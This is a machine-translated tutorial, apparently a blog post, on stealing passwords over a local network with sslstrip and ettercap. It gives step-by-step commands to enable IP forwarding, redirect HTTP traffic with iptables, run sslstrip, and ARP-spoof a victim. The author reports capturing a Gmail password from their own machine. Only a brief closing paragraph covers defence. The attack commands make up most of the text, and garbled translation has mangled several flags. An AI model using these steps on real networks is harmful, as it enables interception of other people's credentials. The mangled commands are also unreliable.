Lan uses SSLSTRIP to break through SSL sniffing password and defense

Preparations

Download sslstrip. Are we downloading the latest version? Wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.7.tar.gz

Visit http://www.thoughtcrime.org/software/sslstrip/#for more help

Installation:

Python setup. py install

Before you start, enable ip_forword forwarding. Otherwise, some errors may occur. If you are interested, you can find the relevant information and test it on your own... On the paper, the screen will be lighter, and the practice will show the truth.

Echo "1">/proc/sys/net/ipv4/ip_forward

Use Iptables to filter data packets

Iptables-t nat-a prerouting-p tcp-destination-port 80-j REDIRECT-to-port 10000

Use iptables to import all http data to port 10000. We use sslstrip to listen to port 10000 and obtain the data we want.

Parameter description:-t: indicates the table to be matched by the command. (net indicates that a new connection package is encountered during query)

Net table has three built-in chains to form the PREROUTING (the package to be modified), the OUTPUT (the local package before the route is modified), and The POSTROUTING (the package to be modified)

-A indicates adding more options after the selected chain

-P indicates the protocol used to filter packets.

-Destination-port 80 indicates that the destination port of the filtered package is 80? -J REDIRECT-to-port 10000 redirects data from port 80 to the specified port for transmission.

Then we use sslstrip to listen to port 10000.

Sslstrip-l 10000

Use ettercap for arp Spoofing

The basic usage of ettercap has been described in the previous video tutorial.

Ettercap-T-q-M arp: remote/192.168.1.101 ///

By default, Ettercap filters out passwords, and we do not need to specify a filter script.

OK to start testing

Echo "1">/proc/sys/net/ipv4/ip_forward

Iptables-t nat-a prerouting-p tcp-destination-port 80-j REDIRECT-to-port 10000

Sslstrip-l 10000

Sslstrip. log will be generated in the current directory of the operation. We can use ettercap without reading this ~~~

Arp spoofing started. I tested my physical machine 192.168.1.101 for attacks.

Ettercap-T-q-M arp: remote/192.168.1.101 ///

Okay. I log on to gmail and check that Ettercap successfully intercepts the gmail password ~~~

? Here, the ettercap password is very convenient. You can also view the sslstrip log file and save our password.

Defense

Sslstrip attacks are man-in-the-middle attacks that require arp spoofing. Therefore, you must bind mac and ip addresses to the gateway and the Local Machine for Bidirectional binding Based on the browser security settings, or enable arpfirewall to defend against arp attacks.